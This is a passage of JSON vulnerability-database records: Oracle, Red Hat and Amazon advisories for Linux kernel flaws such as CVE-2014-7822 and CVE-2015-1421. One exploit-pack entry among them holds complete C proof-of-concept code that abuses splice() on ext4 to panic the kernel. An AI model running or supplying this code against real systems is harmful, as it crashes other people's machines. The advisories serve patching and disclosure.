Prabhu) [1105625]\n- [fs] splice: perform generic write checks (Eric Sandeen) [1155908] {CVE-2014-7822}\n- [fs] ext4: verify block bitmap (Lukas Czerner) [1034403]\n- [fs] ext4: fix type declaration of ext4_validate_block_bitmap (Lukas Czerner) [1034403]\n- [fs] ext4: error out if verifying the block bitmap fails (Lukas Czerner) [1034403]\n- [x86] traps: stop using IST for #SS (Petr Matousek) [1172809] {CVE-2014-9322}\n[2.6.18-401]\n- [net] rds: fix possible double free on sock tear down (Herton R. Krzesinski) [1116880]", "edition": 4, "modified": "2015-02-11T00:00:00", "published": "2015-02-11T00:00:00", "id": "ELSA-2015-0164", "href": "http://linux.oracle.com/errata/ELSA-2015-0164.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421", "CVE-2014-8159"], "description": "[3.10.0-229.1.2]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-229.1.2]\n- [infiniband] core: Prevent integer overflow in ib_umem_get address arithmetic (Doug Ledford) [1181177 1179347] {CVE-2014-8159}\n[3.10.0-229.1.1]\n- [crypto] testmgr: mark rfc4106(gcm(aes)) as fips_allowed (Jarod Wilson) [1197751 1185400]\n- [virt] storvsc: ring buffer failures may result in I/O freeze (Vitaly Kuznetsov) [1197749 1171409]\n- [md] dm-thin: don't allow messages to be sent to a pool target in READ_ONLY or FAIL mode (Mike Snitzer) [1197745 1184592]\n- [kernel] workqueue: fix subtle pool management issue which can stall whole worker_pool (Eric Sandeen) [1197744 1165535]\n- [platform] thinkpad_acpi: support new BIOS version string pattern (Benjamin Tissoires) [1197743 1194830]\n- [x86] ioapic: kcrash: Prevent crash_kexec() from deadlocking on ioapic_lock (Baoquan He) [1197742 1182424]\n- [net] sctp: fix slab corruption from use after free on INIT collisions (Daniel Borkmann) [1196588 1183959] {CVE-2015-1421}", "edition": 4, 
"modified": "2015-03-26T00:00:00", "published": "2015-03-26T00:00:00", "id": "ELSA-2015-0726", "href": "http://linux.oracle.com/errata/ELSA-2015-0726.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3339", "CVE-2015-0239", "CVE-2014-9683"], "description": "kernel-uek\n[3.8.13-68.3.5]\n- KVM: x86: SYSENTER emulation is broken (Nadav Amit) [Orabug: 21502739] {CVE-2015-0239} {CVE-2015-0239}\n- fs: take i_mutex during prepare_binprm for set[ug]id executables (Jann Horn) [Orabug: 21502254] {CVE-2015-3339}\n- eCryptfs: Remove buggy and unnecessary write in file name decode routine (Michael Halcrow) [Orabug: 21502065] {CVE-2014-9683}", "edition": 4, "modified": "2015-07-29T00:00:00", "published": "2015-07-29T00:00:00", "id": "ELSA-2015-3053", "href": "http://linux.oracle.com/errata/ELSA-2015-3053.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:38", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's splice() system call\nvalidated its parameters. On certain file systems, a local, unprivileged\nuser could use this flaw to write past the maximum file size, and thus\ncrash the system. (CVE-2014-7822, Moderate)\n\nRed Hat would like to thank Akira Fujita of NEC for reporting this issue.\n\nThis update also fixes the following bugs:\n\n* Previously, hot-unplugging of a virtio-blk device could in some cases\nlead to a kernel panic, for example during in-flight I/O requests.\nThis update fixes race condition in the hot-unplug code in the\nvirtio_blk.ko module. 
As a result, hot unplugging of the virtio-blk device\nno longer causes the guest kernel oops when there are in-flight I/O\nrequests. (BZ#1006536)\n\n* Before this update, due to a bug in the error-handling path, a corrupted\nmetadata block could be used as a valid block. With this update, the error\nhandling path has been fixed and more checks have been added to verify the\nmetadata block. Now, when a corrupted metadata block is encountered, it is\nproperly marked as corrupted and handled accordingly. (BZ#1034403)\n\n* Previously, an incorrectly initialized variable resulted in a random\nvalue being stored in the variable that holds the number of default ACLs,\nand is sent in the SET_PATH_INFO data structure. Consequently, the setfacl\ncommand could, under certain circumstances, fail with an \"Invalid argument\"\nerror. With this update, the variable is correctly initialized to zero,\nthus fixing the bug. (BZ#1105625)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2017-09-08T12:10:27", "published": "2015-02-10T05:00:00", "id": "RHSA-2015:0164", "href": "https://access.redhat.com/errata/RHSA-2015:0164", "type": "redhat", "title": "(RHSA-2015:0164) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. 
(CVE-2015-1421,\nImportant)\n\nThis issue was discovered by Sun Baoliang of Red Hat.\n\nThis update also fixes the following bugs:\n\n* When ARP is disabled on an interface with an ARP entry for a neighbor\nhost present in the ARP cache, letting the cached entry expire and\nattempting to communicate with that neighbor host could cause the host MAC\naddress to not be resolved correctly after ARP is enabled again on the\ninterface. With the following workaround, the entry is not expired and the\ndescribed scenario works correctly:\n\n1) Add the maximum number of ARP entries you expect for your configuration\nto the proc/sys/net/ipv4/neigh/default/gc_thresh file.\n\n2) Ensure that relevant IP addresses are put in the ARP cache when the\nsystem boots, for example by executing the following two commands:\n\nping [IP address] -c 1\nifconfig ethX -arp\n\n(BZ#1207350)\n\n* Previously, the open() system call in some cases failed with an EBUSY\nerror if the opened file was also being renamed at the same time. With this\nupdate, the kernel automatically retries open() when this failure occurs,\nand if the retry is not successful either, open() now fails with an ESTALE\nerror. (BZ#1207813)\n\n* Previously, a race condition occurred in the build_id_cache__add_s()\nfunction, which could truncate system files. A patch has been provided to\nfix this bug, and system files are no longer truncated in the\naforementioned scenario. (BZ#1210591)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. 
The system must be\nrebooted for this update to take effect.\n", "modified": "2015-05-27T19:14:31", "published": "2015-05-27T04:00:00", "id": "RHSA-2015:1030", "href": "https://access.redhat.com/errata/RHSA-2015:1030", "type": "redhat", "title": "(RHSA-2015:1030) Important: kernel security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-8159", "CVE-2015-1421"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-8159,\nImportant)\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2015-1421,\nImportant)\n\nRed Hat would like to thank Mellanox for reporting the CVE-2014-8159 issue.\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat.\n\nThe MRG-Realtime 3.10 kernel-rt sources have been updated to include the\nfollowing bug fixes:\n\n* The kdump service could become unresponsive due to a deadlock in the\nkernel call ioapic_lock.\n\n* Attempt to make metadata changes such as creating a thin device or\nsnapshot thin device did not error out cleanly.\n\n(BZ#1201384)\n\nThis update also fixes the following bug:\n\n* The MRG kernel scheduler code was missing checks for the PREEMPT_LAZY\nflag allowing tasks to be preempted more times than necessary causing\nlatency spikes on the system. 
Additional checks for the PREEMPT_LAZY flag\nwere added to the check_preempt_wakeup() and check_preempt_curr() functions\nin the scheduler code so that preempt wakeups were reduced and these\nlatency spikes were removed. (BZ#1157949)\n\nAll kernel-rt users are advised to upgrade to these updated packages, which\ncorrect these issues. The system must be rebooted for this update to take\neffect.\n", "modified": "2018-06-07T08:58:25", "published": "2015-03-30T04:00:00", "id": "RHSA-2015:0751", "href": "https://access.redhat.com/errata/RHSA-2015:0751", "type": "redhat", "title": "(RHSA-2015:0751) Important: kernel-rt security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:37", "bulletinFamily": "unix", "cvelist": ["CVE-2014-8159", "CVE-2015-1421"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-8159,\nImportant)\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. 
(CVE-2015-1421,\nImportant)\n\nRed Hat would like to thank Mellanox for reporting the CVE-2014-8159 issue.\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat.\n\nThis update also fixes the following bugs:\n\n* In certain systems with multiple CPUs, when a crash was triggered on one\nCPU with an interrupt handler and this CPU sent Non-Maskable Interrupt\n(NMI) to another CPU, and, at the same time, ioapic_lock had already been\nacquired, a deadlock occurred in ioapic_lock. As a consequence, the kdump\nservice could become unresponsive. This bug has been fixed and kdump now\nworks as expected. (BZ#1197742)\n\n* On Lenovo X1 Carbon 3rd Gen, X250, and T550 laptops, the thinkpad_acpi\nmodule was not properly loaded, and thus the function keys and radio\nswitches did not work. This update applies a new string pattern of BIOS\nversion, which fixes this bug, and function keys and radio switches now\nwork as intended. (BZ#1197743)\n\n* During a heavy file system load involving many worker threads, all worker\nthreads in the pool became blocked on a resource, and no manager thread\nexisted to create more workers. As a consequence, the running processes\nbecame unresponsive. With this update, the logic around manager creation\nhas been changed to assure that the last worker thread becomes a manager\nthread and does not start executing work items. Now, a manager thread\nexists, spawns new workers as needed, and processes no longer hang.\n(BZ#1197744)\n\n* If a thin-pool's metadata enters read-only or fail mode, for example, due\nto thin-pool running out of metadata or data space, any attempt to make\nmetadata changes such as creating a thin device or snapshot thin device\nshould error out cleanly. However, previously, the kernel code returned\nverbose and alarming error messages to the user. With this update, due to\nearly trapping of attempt to make metadata changes, informative errors are\ndisplayed, no longer unnecessarily alarming the user. 
(BZ#1197745)\n\n* When running Red Hat Enterprise Linux as a guest on Microsoft Hyper-V\nhypervisor, the storvsc module did not return the correct error code for\nthe upper level Small Computer System Interface (SCSI) subsystem. As a\nconsequence, a SCSI command failed and storvsc did not handle such a\nfailure properly under some conditions, for example, when RAID devices were\ncreated on top of storvsc devices. An upstream patch has been applied to\nfix this bug, and storvsc now returns the correct error code in the\ndescribed situation. (BZ#1197749)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.", "modified": "2018-07-10T18:08:41", "published": "2015-03-26T13:16:32", "id": "RHSA-2015:0726", "href": "https://access.redhat.com/errata/RHSA-2015:0726", "type": "redhat", "title": "(RHSA-2015:0726) Important: kernel security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:57", "bulletinFamily": "unix", "cvelist": ["CVE-2014-8159", "CVE-2015-1421"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-8159,\nImportant)\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. 
(CVE-2015-1421,\nImportant)\n\nRed Hat would like to thank Mellanox for reporting the CVE-2014-8159 issue.\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat.\n\nThe kernel-rt packages have been upgraded to version 3.10.0-229.1.2, which\nprovides a number of bug fixes over the previous version, including:\n\n- The kdump service could become unresponsive due to a deadlock in the\nkernel call ioapic_lock.\n\n- Attempt to make metadata changes such as creating a thin device or\nsnapshot thin device did not error out cleanly.\n\n(BZ#1203359)\n\nAll kernel-rt users are advised to upgrade to these updated packages, which\ncorrect these issues. The system must be rebooted for this update to take\neffect.", "modified": "2018-03-19T16:29:52", "published": "2015-03-26T13:17:14", "id": "RHSA-2015:0727", "href": "https://access.redhat.com/errata/RHSA-2015:0727", "type": "redhat", "title": "(RHSA-2015:0727) Important: kernel-rt security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421", "CVE-2015-1805"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2015-1421,\nImportant)\n\n* It was found that the Linux kernel's implementation of vectored pipe read\nand write functionality did not take into account the I/O vectors that were\nalready processed when retrying after a failed atomic access operation,\npotentially resulting in memory corruption due to an I/O vector array\noverrun. A local, unprivileged user could use this flaw to crash the system\nor, potentially, escalate their privileges on the system. 
(CVE-2015-1805,\nImportant)\n\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat, and the\nsecurity impact of the CVE-2015-1805 issue was discovered by Red Hat.\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2015-06-10T11:13:52", "published": "2015-06-09T04:00:00", "id": "RHSA-2015:1082", "href": "https://access.redhat.com/errata/RHSA-2015:1082", "type": "redhat", "title": "(RHSA-2015:1082) Important: kernel security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.133.14 (Ubuntu) - splice() System Call Local Denial of Service", "edition": 1, "published": "2015-04-13T00:00:00", "title": "Linux Kernel 3.133.14 (Ubuntu) - splice() System Call Local Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7822"], "modified": "2015-04-13T00:00:00", "id": "EXPLOITPACK:93D47AC26E5DA900EF305FD8DD1D8904", "href": "", "sourceData": "/* ----------------------------------------------------------------------------------------------------\n * cve-2014-7822_poc.c\n * \n * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file\n * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, \n * as demonstrated by use of a file descriptor associated with an ext4 filesystem. \n *\n * \n * This is a POC to reproduce vulnerability. 
No exploitation here, just simple kernel panic.\n * Works on ext4 filesystem\n * Tested on Ubuntu with 3.13 and 3.14 kernels\n * \n * Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c \n * \n * \n * Emeric Nasi - www.sevagas.com\n *-----------------------------------------------------------------------------------------------------*/\n\n\n/* ----------------------- Includes ----------------------------*/\n\n#define _GNU_SOURCE\n#include <fcntl.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <errno.h>\n#include <string.h>\n#include <stdlib.h>\n#include <limits.h>\n\n#define EXPLOIT_NAME \"cve-2014-7822\"\n#define EXPLOIT_TYPE DOS\n\n#define JUNK_SIZE 30000\n\n/* ----------------------- functions ----------------------------*/\n\n\n/* Useful:\n * \n+============+===============================+===============================+\n| \\ File flag| | |\n| \\ | !EXT4_EXTENTS_FL | EXT4_EXTENTS_FL |\n|Fs Features\\| | |\n+------------+-------------------------------+-------------------------------+\n| !extent | write: 2194719883264 | write: -------------- |\n| | seek: 2199023251456 | seek: -------------- |\n+------------+-------------------------------+-------------------------------+\n| extent | write: 4402345721856 | write: 17592186044415 |\n| | seek: 17592186044415 | seek: 17592186044415 |\n+------------+-------------------------------+-------------------------------+\n*/\n\n\n/**\n * Poc for cve_2014_7822 vulnerability\n */\nint main()\n{\n int pipefd[2];\n int result;\n int in_file;\n int out_file;\n int zulHandler;\n loff_t viciousOffset = 0;\n \n char junk[JUNK_SIZE] ={0};\n \n result = pipe(pipefd);\n \n // Create and clear zug.txt and zul.txt files\n system(\"cat /dev/null > zul.txt\");\n system(\"cat /dev/null > zug.txt\");\n \n // Fill zul.txt with A\n zulHandler = open(\"zul.txt\", O_RDWR);\n memset(junk,'A',JUNK_SIZE);\n write(zulHandler, junk, JUNK_SIZE);\n close(zulHandler);\n\n //put content of zul.txt in pipe\n 
viciousOffset = 0;\n in_file = open(\"zul.txt\", O_RDONLY);\n result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);\n close(in_file);\n \n\n // Put content of pipe in zug.txt\n out_file = open(\"zug.txt\", O_RDWR); \n viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!\n printf(\"[cve_2014_7822]: ViciousOffset = %lu\\n\", (unsigned long)viciousOffset);\n \n result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615\n if (result == -1)\n {\n printf(\"[cve_2014_7822 error]: %d - %s\\n\", errno, strerror(errno));\n exit(1);\n }\n close(out_file);\n\n close(pipefd[0]);\n close(pipefd[1]);\n \n \n //Open zug.txt \n in_file = open(\"zug.txt\", O_RDONLY);\n close(in_file);\n \n printf(\"[cve_2014_7822]: POC triggered, ... system will panic after some time\\n\");\n \n return 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-8989"], "description": "**Issue Overview:**\n\nThe Linux kernel through 3.17.4 does not properly restrict dropping of supplemental group memberships in certain namespace scenarios, which allows local users to bypass intended file permissions by leveraging a POSIX ACL containing an entry for the group category that is more restrictive than the entry for the other category, aka a \"negative groups\" issue, related to kernel/groups.c, kernel/uid16.c, and kernel/user_namespace.c. ([CVE-2014-8989 __](<https://access.redhat.com/security/cve/CVE-2014-8989>))\n\nA flaw was found in the way the Linux kernel's splice() system call validated its parameters. On certain file systems, a local, unprivileged user could use this flaw to write past the maximum file size, and thus crash the system. 
([CVE-2014-7822 __](<https://access.redhat.com/security/cve/CVE-2014-7822>))\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum clean all_ followed by _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n perf-debuginfo-3.14.33-26.47.amzn1.i686 \n perf-3.14.33-26.47.amzn1.i686 \n kernel-tools-debuginfo-3.14.33-26.47.amzn1.i686 \n kernel-tools-devel-3.14.33-26.47.amzn1.i686 \n kernel-debuginfo-3.14.33-26.47.amzn1.i686 \n kernel-debuginfo-common-i686-3.14.33-26.47.amzn1.i686 \n kernel-devel-3.14.33-26.47.amzn1.i686 \n kernel-headers-3.14.33-26.47.amzn1.i686 \n kernel-3.14.33-26.47.amzn1.i686 \n kernel-tools-3.14.33-26.47.amzn1.i686 \n \n noarch: \n kernel-doc-3.14.33-26.47.amzn1.noarch \n \n src: \n kernel-3.14.33-26.47.amzn1.src \n \n x86_64: \n kernel-devel-3.14.33-26.47.amzn1.x86_64 \n kernel-tools-devel-3.14.33-26.47.amzn1.x86_64 \n perf-3.14.33-26.47.amzn1.x86_64 \n kernel-tools-3.14.33-26.47.amzn1.x86_64 \n kernel-3.14.33-26.47.amzn1.x86_64 \n kernel-headers-3.14.33-26.47.amzn1.x86_64 \n perf-debuginfo-3.14.33-26.47.amzn1.x86_64 \n kernel-tools-debuginfo-3.14.33-26.47.amzn1.x86_64 \n kernel-debuginfo-3.14.33-26.47.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-3.14.33-26.47.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2015-02-11T19:34:00", "published": "2015-02-11T19:34:00", "id": "ALAS-2015-476", "href": "https://alas.aws.amazon.com/ALAS-2015-476.html", "title": "Medium: kernel", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}